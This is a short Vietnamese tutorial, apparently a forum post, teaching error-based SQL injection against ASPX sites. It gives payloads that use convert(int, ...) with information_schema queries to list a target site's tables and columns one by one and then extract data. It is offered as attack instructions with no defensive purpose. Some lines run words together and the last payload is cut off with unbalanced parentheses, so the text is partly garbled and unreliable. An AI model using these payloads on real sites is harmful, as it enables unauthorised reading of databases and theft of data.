Giải thích : Site này thuộc dạng sql injection aspx.
Có rất nhiều dạng sql injection như : sql injection xpath, sql injection basic, sql injection DIOS, sql injection error based.
Cách để phân biệt các dạng đó mình sẽ nói chi tiết trong những bài sau (sau khi đã làm đủ video các dạng cho các bạn xem
Câu lênh:
1. Show databaseand 1=convert(int,(select top 1 table_name from information_schema.tables))– –
sẽ show ra table đầu tiên của site.
Sau đó chúng ta sẽ lần lượt show ra từng table 1 bằng câu lệnh
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in (‘table đã xuất hiện 1′,’table đã xuất hiện 2’)))–
Các bạn cứ điền dần như vậy cho đến khi tìm thấy hết toàn bộ table hoặc dò đến table mà mình cần get là đc.
2. Show Columns
Nếu các bạn muốn xem table tiếp theo thì dùng lệnhand 1=convert(int,(select top 1 column_name from information_schema.columns where table_name =(‘table cần get’)))–
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name =(‘table cần get’) and column_name not in (‘Column đã xuất hiện 1′,’Column đã xuất hiện 2’)))–
3. Show data
End TUTand 1=convert(int,(select top 1 Column_muốn_show from Table_của_column_đó–
